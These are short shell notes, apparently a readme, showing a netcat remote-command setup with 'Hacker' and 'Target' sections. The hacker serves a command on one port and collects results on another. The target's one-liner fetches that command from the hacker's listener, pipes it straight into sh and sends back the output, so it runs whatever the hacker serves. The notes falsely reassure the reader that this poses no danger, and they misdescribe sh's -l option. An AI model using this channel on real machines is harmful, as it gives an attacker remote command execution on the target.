#In the name of Allah

#***In all applications, set your IP address to 0.0.0.0.***


#----------Hacker----------
sh -l hacker.sh
#The -l option in sh runs the script.
#Or `echo 1 | nc -lp 8500 -s 0.0.0.0 -e sh -c 'echo "ls -lda /etc/" ' && echo 1 | nc -lp 8600 -s 0.0.0.0`


###The command we want is "ls -lda /etc/".
###Port 8500 is opened on our system, it only specifies commands and does not pose any danger to you.
###Port 8600 is opened on our system and is used to receive execution reports.




#----------Target----------
sh -l target.sh
#Or `echo 1 | nc 0.0.0.0 8600 -e sh -c "echo $(nc 0.0.0.0 8500 2>/dev/null | sh)"`

